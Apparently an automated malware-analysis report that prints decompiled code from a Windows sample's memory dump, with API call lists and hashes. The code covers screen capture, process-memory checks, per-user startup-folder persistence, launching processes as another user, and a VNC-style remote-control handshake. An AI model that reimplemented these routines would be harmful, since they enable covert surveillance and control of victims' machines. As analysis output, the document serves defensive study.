    										if(_v88() != 0 || _v12 == 0) {
    											goto L61;
    										} else {
    											_push( &_v28);
    											_push( &_a12);
    											_a12 = 0;
    											_v28 = 0;
    											if(_v40() != 0) {
    												L60:
    												_v72(_v12);
    												goto L61;
    											}
    											_t215 = _v28;
    											if(_v28 == 0 || _a12 == 0) {
    												goto L60;
    											} else {
    												_t264 = E00411991(_t215);
    												_v40 = _t264;
    												if(_t264 == 0) {
    													goto L60;
    												}
    												_push(_t264);
    												_push(_v28);
    												_push(_a12);
    												if(_v64() != 0) {
    													L52:
    													E004119C1(_v40);
    													if(_a12 == 0) {
    														_push( &_v32);
    														_push(1);
    														_push(0);
    														if(_v120() == 0 && _v32 != 0) {
    															_v152 = 0;
    															if(_a8 > 0) {
    																E004119FD( &_v148, 0x4049fc, 0x10);
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
    																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
    																_v152 = _v152 + 1;
    															}
    															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
    															_t224 = _v32;
    															if(_t223 == 0) {
    																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
    															} else {
    																 *((intOrPtr*)( *_t224 + 8))(_t224);
    																_v32 = 0;
    															}
    														}
    													}
    													goto L60;
    												}
    												_t272 = 0;
    												if(_a12 <= 0) {
    													goto L52;
    												}
    												_t265 = _t264 + 0x30;
    												while(lstrcmpiW(_a4,  *_t265) != 0) {
    													_t272 = _t272 + 1;
    													_t265 =  &(_t265[0x13]);
    													if(_t272 < _a12) {
    														continue;
    													}
    													goto L52;
    												}
    												E004119FD( &_v188, _t272 * 0x4c + _v40, 0x10);
    												_a12 = 0;
    												goto L52;
    											}
    										}
    									}
    								}
    							}
    							goto L24;
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041A1DB
    • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041A1EC
    • GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041A1F9
    • GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041A206
    • GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041A213
    • GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041A220
    • GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041A22D
    • GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041A23A
    • LoadLibraryA.KERNEL32(ole32.dll), ref: 0041A282
    • GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041A28D
    • LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041A29F
    • GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041A2AA
    • GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041A2B6
    • GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041A2C3
    • GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041A2D0
    • GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041A2DD
    • GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041A2EA
    • GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0041A2F7
    • GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0041A304
    • LoadImageW.USER32 ref: 0041A3A8
    • GetIconInfo.USER32(00000000,?), ref: 0041A3BD
    • GetCursorPos.USER32(?), ref: 0041A3CB
    • DrawIcon.USER32 ref: 0041A49C
    • lstrcmpiW.KERNEL32(?,-00000030), ref: 0041A51D
    • FreeLibrary.KERNEL32(00000000), ref: 0041A634
    • FreeLibrary.KERNEL32(?), ref: 0041A63E
    • FreeLibrary.KERNEL32(00000000), ref: 0041A648
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
    • String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
    • API String ID: 1554524784-1167942225
    • Opcode ID: d7050f9bf1043ccdf2d03a9b81d32f155d50e404b165458badccfc6989ad026c
    • Instruction ID: 25454cda541120ec7fb62d097dfd22ae5ffbc37c87e01f61947688c9320e08cd
    • Opcode Fuzzy Hash: d7050f9bf1043ccdf2d03a9b81d32f155d50e404b165458badccfc6989ad026c
    • Instruction Fuzzy Hash: 21E1E2B1D01259ABCF209FE5CD88AEEBBB9FF48304F14442BE615B2250D7789990CF59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00406B42(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
    				char _v536;
    				void* _v540;
    				char _v544;
    				char _v644;
    				signed char _v648;
    				char _v748;
    				short _v760;
    				char _v764;
    				short _v772;
    				int _v776;
    				int _v780;
    				void _v781;
    				void* _v784;
    				char _v785;
    				void _v788;
    				void _v789;
    				void* _v792;
    				char _v793;
    				char _v797;
    				void* _v800;
    				void* _v804;
    				void* _v808;
    				char _v809;
    				int _v813;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				int _t74;
    				int _t79;
    				intOrPtr* _t80;
    				int _t82;
    				char _t84;
    				int _t87;
    				void* _t91;
    				int _t99;
    				char _t102;
    				int _t106;
    				void* _t111;
    				int _t128;
    				void* _t143;
    				void* _t145;
    
    				_t134 = __ecx;
    				_t147 =  &_v764;
    				_v781 = 0;
    				if(E00416BD6(0, __ecx,  &_v764,  *0x42258c) != 0) {
    					_v780 = _v760;
    					_t128 = E004067BB( &_v780, __ecx, _v764);
    					_v776 = _t128;
    					if(_t128 == 0) {
    						_v780 = 0;
    					}
    					E00416C7E( &_v764);
    				}
    				if(_v780 != 0x1e6) {
    					__eflags = _v780 - 0xc;
    					if(__eflags != 0) {
    						L41:
    						E004119C1(_v772);
    						return _v785;
    					}
    					_t74 = E0040634D(_t134, __eflags, 0x8889347b, 2);
    					_v776 = _t74;
    					__eflags = _t74;
    					if(_t74 == 0) {
    						L39:
    						__eflags = _a8 - 1;
    						if(_a8 == 1) {
    							E00413426(0, _t147,  *0x42258c);
    						}
    						goto L41;
    					}
    					E00406312(0x19367401,  &_v748, 1);
    					_t79 = E004151A4( &_v760);
    					_t147 = GetFileAttributesExW;
    					__eflags = _t79;
    					if(_t79 == 0) {
    						L23:
    						_t80 =  *0x422534; // 0x0
    						__imp__IsWellKnownSid( *_t80, 0x16);
    						__eflags = _t80 - 1;
    						if(__eflags != 0) {
    							_v789 = 0;
    							_t82 = ReadProcessMemory(0xffffffff, _t147,  &_v789, 1, 0);
    							__eflags = _t82;
    							if(_t82 == 0) {
    								L29:
    								_push( *((intOrPtr*)(_v780 + 4)));
    								_t84 = E00417DD6(_t134, E0041C612,  *((intOrPtr*)(_v780 + 8)));
    								_t147 = 0x422590;
    								E0041C612();
    								_v797 = _t84;
    								L30:
    								__eflags = _v793 - 1;
    								if(_v793 == 1) {
    									_t87 = E00413288( &_v536, 0, _t147, 0,  &_v776);
    									__eflags = _t87;
    									_v813 = _t87 != 0;
    									__eflags = _v813;
    									if(_v813 != 0) {
    										E00406312(0x1a43533f,  &_v760, 1);
    										_t91 = CreateEventW(0x422568, 1, 0,  &_v772);
    										_t143 = _v788;
    										_v804 = _t91;
    										_v800 = _t143;
    										_push(0xffffffff);
    										__eflags = _t91;
    										if(_t91 != 0) {
    											WaitForMultipleObjects(2,  &_v792, 0, ??);
    										} else {
    											WaitForSingleObject(_t143, ??);
    										}
    										_t147 = CloseHandle;
    										__eflags = _v792;
    										if(_v792 != 0) {
    											CloseHandle(_v792);
    										}
    										CloseHandle(_v772);
    										CloseHandle(_t143);
    									}
    								}
    								L38:
    								E00415194(_v780);
    								goto L39;
    							}
    							__eflags = _v789 - 0xe9;
    							if(_v789 != 0xe9) {
    								goto L29;
    							}
    							_t99 = GetFileAttributesExW(0x42299e, 0x78f16360,  &_v788);
    							__eflags = _t99 - 1;
    							if(_t99 != 1) {
    								goto L29;
    							}
    							_push( *((intOrPtr*)(_v784 + 4)));
    							E00417DD6(_t134, L0041C97E,  *_v784);
    							_push(_a4);
    							_t102 =  &_v544;
    							_t147 = 0x422590;
    							_push(_t102);
    							L0041C97E();
    							_v809 = _t102;
    							VirtualFree(_v808, 0, 0x8000);
    							goto L30;
    						}
    						_v789 = E0041CCDE(__eflags);
    						goto L38;
    					} else {
    						goto L20;
    					}
    					while(1) {
    						L20:
    						_v781 = 0;
    						_t106 = ReadProcessMemory(0xffffffff, _t147,  &_v781, 1, 0);
    						__eflags = _t106;
    						if(_t106 == 0) {
    							goto L22;
    						}
    						__eflags = _v781 - 0xe9;
    						if(_v781 == 0xe9) {
    							goto L23;
    						}
    						L22:
    						Sleep(0x1f4);
    					}
    				}
    				if(E0041C8C7(_t134, _v772) != 0) {
    					E00406312(0x32901130,  &_v748, 1);
    					_t111 = CreateMutexW(0x422568, 1,  &_v760);
    					_v792 = _t111;
    					if(_t111 != 0) {
    						if(GetLastError() == 0xb7) {
    							CloseHandle(_v780);
    							_v780 = 0;
    						}
    						if(_v780 != 0) {
    							E00419C2A(_t134,  &_v644);
    							if((_v648 & 0x00000020) != 0) {
    								 *0x422530 =  *0x422530 | 0x00000010;
    							}
    							E0041A01E();
    							if(( *0x422530 & 0x00000010) != 0) {
    								ExitWindowsEx(0x14, 0x80000000);
    							}
    							E00406312(0x1a43533f,  &_v748, 1);
    							_t145 = OpenEventW(2, 0,  &_v760);
    							if(_t145 != 0) {
    								SetEvent(_t145);
    								CloseHandle(_t145);
    							}
    							E00406878(1);
    							_v785 = 1;
    							CloseHandle(_v784);
    						}
    					}
    				}
    				goto L41;
    			}

    APIs
      • Part of subcall function 00416BD6: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00406B68,?,?,00000000), ref: 00416BFB
      • Part of subcall function 00416BD6: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00406B68,?,?,00000000), ref: 00416C0E
    • CreateMutexW.KERNEL32(00422568,00000001,?,32901130,?,00000001,?), ref: 00406BD2
    • GetLastError.KERNEL32 ref: 00406BE4
    • CloseHandle.KERNEL32(000001E6), ref: 00406BFB
    • ExitWindowsEx.USER32 ref: 00406C3E
    • OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00406C5D
    • SetEvent.KERNEL32(00000000), ref: 00406C6A
    • CloseHandle.KERNEL32(00000000), ref: 00406C71
    • CloseHandle.KERNEL32(000001E6,00000001), ref: 00406C83
    • ReadProcessMemory.KERNEL32(000000FF,7519F9B0,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00406CE7
    • Sleep.KERNEL32(000001F4), ref: 00406CF9
    • IsWellKnownSid.ADVAPI32(00000000,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00406D0A
    • ReadProcessMemory.KERNEL32(000000FF,7519F9B0,00000000,00000001,00000000), ref: 00406D32
    • VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00406D91
    • GetFileAttributesExW.KERNEL32(0042299E,78F16360,0000000C), ref: 00406D4E
      • Part of subcall function 00417DD6: VirtualProtect.KERNEL32(0041C612,?,00000040,00000000,7519F9B0,?,?,00406DAD,?,?), ref: 00417DEB
      • Part of subcall function 00417DD6: VirtualProtect.KERNEL32(0041C612,?,00000000,00000000,?,?,00406DAD,?,?), ref: 00417E1E
    • CreateEventW.KERNEL32(00422568,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,00422590,00000000,?,?,?), ref: 00406E0F
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00406E28
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00406E38
    • CloseHandle.KERNEL32(0000000C), ref: 00406E4E
    • CloseHandle.KERNEL32(?), ref: 00406E54
    • CloseHandle.KERNEL32(?), ref: 00406E57
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
    • String ID:
    • API String ID: 561470431-3916222277
    • Opcode ID: 3f00d516f023f75e0ac1153187722603ef45193f599eafe630d3e24c3b4c6e40
    • Instruction ID: 91be39eb656dfda769d5d082a6965e7370629da91ce05b78167d963005cb1dc4
    • Opcode Fuzzy Hash: 3f00d516f023f75e0ac1153187722603ef45193f599eafe630d3e24c3b4c6e40
    • Instruction Fuzzy Hash: 6791DF71508345AFD711EF60CD84EAF7BE8AF84304F41493EF585A22A1C778C998DB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0041CCDE(void* __eflags) {
    				char _v5;
    				char* _v12;
    				char _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				char _v56;
    				char _v88;
    				char _v608;
    				short _v1128;
    				char _v1648;
    				void* __edi;
    				void* __esi;
    				_Unknown_base(*)()* _t63;
    				int _t69;
    				char _t70;
    				char _t76;
    				int _t80;
    				char _t81;
    				char _t82;
    				char _t86;
    				char _t88;
    				WCHAR* _t98;
    				int _t99;
    				CHAR* _t110;
    				char* _t111;
    				WCHAR* _t112;
    				struct HINSTANCE__* _t113;
    				signed int _t114;
    				void* _t115;
    
    				_t112 =  &_v56;
    				_v5 = 0;
    				E00419DD3(0xe1, _t112);
    				_t113 = LoadLibraryW(_t112);
    				if(_t113 == 0) {
    					L7:
    					return 0;
    				} else {
    					_t110 =  &_v88;
    					E00419D9D(0xe2, _t110);
    					_t63 = GetProcAddress(_t113, _t110);
    					if(_t63 != 0) {
    						_push( &_v12);
    						_t106 =  &_v608;
    						_push( &_v608);
    						_v12 = 0x104;
    						if( *_t63() == 1) {
    							_t98 =  &_v1128;
    							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
    							if(_t98 == 0) {
    								_t106 =  &_v608;
    								_t99 = E00412510(_t106);
    								_v12 = _t99;
    								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
    									_t106 = _t115 + _v12 * 2 - 0x464;
    									E00411D62(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
    									_v5 = 1;
    								}
    							}
    						}
    					}
    					FreeLibrary(_t113);
    					if(_v5 != 0) {
    						_v5 = 0;
    						_v28 = 0;
    						_t111 = L".exe";
    						do {
    							_v12 = 0;
    							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
    							_v24 = _t69;
    							__eflags = _t69;
    							if(_t69 == 0) {
    								L11:
    								__eflags = _v12;
    								if(_v12 == 0) {
    									goto L24;
    								}
    								_t114 = 0;
    								__eflags = _v20;
    								if(_v20 <= 0) {
    									L23:
    									NetApiBufferFree(_v12);
    									goto L24;
    								} else {
    									goto L13;
    								}
    								do {
    									L13:
    									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
    									__eflags = _t80;
    									if(_t80 == 0) {
    										_t81 = _v16;
    										__eflags = _t81;
    										if(_t81 != 0) {
    											_t106 =  &_v608;
    											_t82 = E0041D902( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
    											__eflags = _t82;
    											if(_t82 != 0) {
    												_t86 = E00417246( &_v1128,  &_v608,  &_v608);
    												__eflags = _t86;
    												if(_t86 != 0) {
    													_t88 = E00416FC8( &_v608);
    													__eflags = _t88;
    													if(_t88 != 0) {
    														__eflags = E00415E71(0,  &_v608,  &_v1648, _t111, 6);
    														if(__eflags != 0) {
    															__eflags = E0041C3DD( &_v608, __eflags, 0,  &_v1648, 0);
    															if(__eflags != 0) {
    																_v5 = 1;
    																E0041C50A( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
    															}
    														}
    													}
    												}
    											}
    											NetApiBufferFree(_v16);
    										}
    									}
    									_t114 = _t114 + 1;
    									__eflags = _t114 - _v20;
    								} while (_t114 < _v20);
    								goto L23;
    							}
    							__eflags = _t69 - 0xea;
    							if(_t69 != 0xea) {
    								break;
    							}
    							goto L11;
    							L24:
    							__eflags = _v24 - 0xea;
    						} while (_v24 == 0xea);
    						_t70 =  &_v1128;
    						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
    						__eflags = _t70;
    						if(_t70 == 0) {
    							__eflags = E00415E71(0,  &_v1128,  &_v1648, _t111, 6);
    							if(__eflags != 0) {
    								_t76 = E0041C3DD(_t106, __eflags, 0,  &_v1648, 0);
    								__eflags = _t76;
    								if(_t76 != 0) {
    									_v5 = 1;
    								}
    							}
    						}
    						return _v5;
    					}
    					goto L7;
    				}
    			}

    APIs
    • LoadLibraryW.KERNEL32(?,75145B60,7519F9B0,00000000), ref: 0041CCFF
    • GetProcAddress.KERNEL32(00000000,?), ref: 0041CD20
    • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0041CD51
    • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0041CD74
    • FreeLibrary.KERNEL32(00000000), ref: 0041CD9B
    • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0041CDD1
    • NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0041CE0A
    • NetApiBufferFree.NETAPI32(?,?,?), ref: 0041CEA3
    • NetApiBufferFree.NETAPI32(?), ref: 0041CEB6
    • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0041CEDA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
    • String ID: .exe
    • API String ID: 1753652487-4119554291
    • Opcode ID: 5e39a4079ee2592e2b10d9816e6c0fcaab334ec2413beb73f2392c93b71dde46
    • Instruction ID: 8f926784a51602361d6a21b36e697b86514f82b474d971de4b3fa7fd086029e3
    • Opcode Fuzzy Hash: 5e39a4079ee2592e2b10d9816e6c0fcaab334ec2413beb73f2392c93b71dde46
    • Instruction Fuzzy Hash: EE619371940218AFCF20DBA0DCC5FEF7BBDAB45304F4045AAF516F2191D7399A898B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E004132E3(void* _a4, WCHAR* _a8) {
    				WCHAR* _v5;
    				char _v12;
    				signed int _v16;
    				struct HINSTANCE__* _v20;
    				_Unknown_base(*)()* _v24;
    				struct _PROCESS_INFORMATION _v40;
    				struct _STARTUPINFOW _v108;
    				struct HINSTANCE__* _t28;
    				_Unknown_base(*)()* _t31;
    				WCHAR* _t49;
    				long _t50;
    				intOrPtr* _t52;
    
    				_v5 = 0;
    				_t28 = LoadLibraryA("userenv.dll");
    				_v20 = _t28;
    				if(_t28 != 0) {
    					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
    					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
    					_v24 = _t31;
    					if(_t52 != 0 && _t31 != 0) {
    						_push(0);
    						_push(_a4);
    						_push( &_v16);
    						_v16 = 0;
    						if( *_t52() == 0) {
    							_v16 = 0;
    						}
    						_t50 = 0x44;
    						_v12 = 0;
    						E00411A74( &_v108,  &_v108, 0, _t50);
    						_t49 = _a8;
    						_v108.cb = _t50;
    						_v108.lpDesktop = 0;
    						if(_t49 == 0) {
    							_t49 =  &_v12;
    						}
    						asm("sbb eax, eax");
    						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
    							CloseHandle(_v40.hThread);
    							CloseHandle(_v40);
    							_v5 = _v40.dwProcessId != 0;
    						}
    						if(_v16 != 0) {
    							_v24(_v16);
    						}
    					}
    					FreeLibrary(_v20);
    				}
    				return _v5 & 0x000000ff;
    			}

    APIs
    • LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 004132F4
    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00413313
    • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041331F
    • CreateProcessAsUserW.ADVAPI32(?,00000000,0041C4ED,00000000,00000000,00000000,0041C4ED,0041C4ED,00000000,?,?,?,00000000,00000044), ref: 00413390
    • CloseHandle.KERNEL32(?), ref: 004133A3
    • CloseHandle.KERNEL32(?), ref: 004133A8
    • FreeLibrary.KERNEL32(?), ref: 004133BF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
    • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
    • API String ID: 3080530829-1103369309
    • Opcode ID: 29f0d418c44b12f8a1955e8c05a9a48ab796327e3a33c267dc67c2126bae49af
    • Instruction ID: 5233cac688404e5bbfdc5a2a24ce46039259bf70aa23ebafeaeed5178dfaa360
    • Opcode Fuzzy Hash: 29f0d418c44b12f8a1955e8c05a9a48ab796327e3a33c267dc67c2126bae49af
    • Instruction Fuzzy Hash: 2F2105B2D0021DBFDF109FA5CC849EEBBBCEB48345F10846AE911B2160D6399E44CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E0041115E(void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, signed char _a15, void* _a16) {
    				signed int _v8;
    				signed int _v13;
    				signed short _v15;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				char _v31;
    				signed int _v32;
    				signed int _v36;
    				short _v41;
    				short _v43;
    				char _v44;
    				char _v49;
    				char _v52;
    				char _v53;
    				char _v56;
    				char _v60;
    				signed int _v64;
    				char _v77;
    				char _v78;
    				unsigned int _v80;
    				signed int _v84;
    				char _v100;
    				signed short _v102;
    				signed short _v104;
    				signed int _v109;
    				char _v112;
    				char _v116;
    				char _v124;
    				char _v380;
    				void* __edi;
    				void* __esi;
    				void* _t205;
    				char _t206;
    				void* _t208;
    				signed char _t212;
    				unsigned int _t220;
    				signed int _t225;
    				signed int _t257;
    				signed int _t261;
    				signed int _t262;
    				void* _t264;
    				signed int _t265;
    				void* _t274;
    				void* _t280;
    				signed int _t288;
    				signed int _t289;
    				void* _t291;
    				signed int _t292;
    				signed short _t296;
    				unsigned int _t297;
    				signed int _t300;
    				signed int _t301;
    				signed int _t303;
    				intOrPtr _t305;
    				signed int _t309;
    				void* _t311;
    				signed int _t312;
    				signed int _t316;
    				signed int _t318;
    				signed int _t319;
    				void* _t321;
    				signed int _t322;
    				signed int _t329;
    				void* _t331;
    				signed int _t332;
    				signed int _t333;
    				signed char _t335;
    				void* _t352;
    				signed int _t353;
    				void* _t355;
    				signed int _t356;
    				signed int _t366;
    				signed int _t375;
    				signed int _t382;
    				signed int _t389;
    				signed int _t390;
    				unsigned int _t426;
    				signed char _t442;
    				signed char _t444;
    				signed char _t446;
    				signed int _t452;
    				signed int _t461;
    				void* _t472;
    				signed int _t479;
    				signed int _t490;
    				signed int _t491;
    				signed int _t496;
    				char _t505;
    				intOrPtr _t506;
    				signed int _t507;
    				signed short _t509;
    				intOrPtr* _t517;
    				signed int _t525;
    				void* _t527;
    
    				_t506 = _a8;
    				_t206 = E004149EB(_t205, _a4, "RFB 003.003\n", 0xc);
    				if(_t206 == 0) {
    					L107:
    					return _t206;
    				}
    				_push(0x1b7740);
    				_push( &_v60);
    				_t208 = 0xc;
    				_t206 = E00414974(_t208, _a4);
    				if(_t206 == 0) {
    					goto L107;
    				}
    				_push( &_v60);
    				_t472 = 4;
    				_t206 = E00412524(_t472, "RFB ", _t472);
    				if(_t206 != 0) {
    					goto L107;
    				}
    				_v53 = _t206;
    				_v49 = _t206;
    				_t212 = E00412040( &_v52, "RFB ", 0);
    				_t206 = ((E00412040( &_v56, "RFB ", 0) & 0x000000ff | (_t212 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
    				if(_t206 > 0x300) {
    					goto L107;
    				} else {
    					_v24 = _v24 & 0x00000000;
    					_v20 = 1;
    					 *((intOrPtr*)(_t506 + 4))( &_v24);
    					_t220 = _v20;
    					_t479 = (_t220 & 0x0000ff00 | _t220 << 0x00000010) << 8;
    					_t399 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
    					_v36 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
    					if(E004149EB( &_v36, _a4,  &_v36, 4) == 0) {
    						_v20 = _v20 | 0xffffffff;
    					}
    					_t225 = _v20;
    					if(_t225 == 0) {
    						return E004110F8(_t399, __eflags, _a4, _v24);
    					}
    					_t206 = _t225 - 1;
    					if(_t206 != 0) {
    						goto L107;
    					}
    					_t206 = E00414974(1, _a4,  &_v31, 0x1b7740);
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_t206 =  *((intOrPtr*)(_t506 + 8))();
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_v36 = _v36 & 0x00000000;
    					_t206 =  *((intOrPtr*)(_t506 + 0xc))( &_v124);
    					_t403 = _t206;
    					_t541 = _t206;
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_t206 = E00410F37( &_v124, _t403,  &_v36, _t541, _a12);
    					_t505 = _t206;
    					if(_t505 == 0) {
    						goto L107;
    					}
    					_t507 = E004124FE(_v36);
    					_v104 =  *(_t505 + 8) << 0x00000008 |  *(_t505 + 9) & 0x000000ff;
    					_v102 =  *(_t505 + 0xa) << 0x00000008 |  *(_t505 + 0xb) & 0x000000ff;
    					_v84 = (_t507 & 0x00ff0000 | _t507 >> 0x00000010) >> 0x00000008 | (_t507 << 0x00000010 | _t507 & 0x0000ff00) << 0x00000008;
    					_t44 = _t505 + 0x20; // 0x20
    					E004119FD( &_v100, _t44, 0x10);
    					asm("rol word [ebp-0x5c], 0x8");
    					asm("rol word [ebp-0x5a], 0x8");
    					asm("rol word [ebp-0x58], 0x8");
    					if(E004149EB( &_v104, _a4,  &_v104, 0x18) == 0 || _t507 > 0 && E004149EB(_t247, _a4, _v36, _t507) == 0) {
    						return E004110C5(_t505);
    					} else {
    						_v41 = 0xffff;
    						_v44 = 0;
    						_v43 = 0xffff;
    						E00411A74( &_v380,  &_v380, 0, 0xff);
    						E00411A74( &_v380,  &_v380, 0, 0xff);
    						_v8 = 0;
    						_v20 = 0;
    						goto L16;
    						do {
    							while(1) {
    								L16:
    								_t375 = _v8;
    								_t509 = 0;
    								if(_t375 <= 0) {
    									goto L35;
    								}
    								L17:
    								_t274 = E00414C71(0,  &_a4, 0x12c, 0);
    								if(_t274 != 0xffffffff) {
    									goto L35;
    								}
    								__imp__#111();
    								if(_t274 != 0x274c) {
    									L104:
    									E004110C5(_t505);
    									return E004119C1(_v20);
    								}
    								if(_a16 != 0) {
    									WaitForSingleObject(_a16, 0xffffffff);
    								}
    								 *((intOrPtr*)(_a8 + 0x10))();
    								_v28 = _t509;
    								if(_t375 <= _t509) {
    									L33:
    									if(_a16 != _t509) {
    										ReleaseMutex(_a16);
    									}
    									continue;
    									do {
    										while(1) {
    											L16:
    											_t375 = _v8;
    											_t509 = 0;
    											if(_t375 <= 0) {
    												goto L35;
    											}
    											goto L17;
    										}
    										L90:
    										__eflags =  *(_t505 + 0x1c);
    									} while ( *(_t505 + 0x1c) != 0);
    									break;
    								} else {
    									_v24 = _t509;
    									_t390 = _t375 * 9;
    									do {
    										_t527 = _v24 + _v20;
    										if( *((short*)(_t527 + 5)) > 0 &&  *((short*)(_t527 + 7)) > 0) {
    											_push(_t527);
    											_push(_a4);
    											_t280 = E00410BCF(_t505);
    											if(_t280 == 0xffffffff || _t280 == 0) {
    												__eflags = _a16;
    												if(_a16 != 0) {
    													ReleaseMutex(_a16);
    												}
    												goto L104;
    											} else {
    												if(_t280 == 1) {
    													_t283 = _v28 + 1;
    													if(_v28 + 1 != _v8) {
    														E00411A74(_t283, _t527, 0, 9);
    													} else {
    														_v8 = _v8 - 1;
    														_t390 = _t390 - 9;
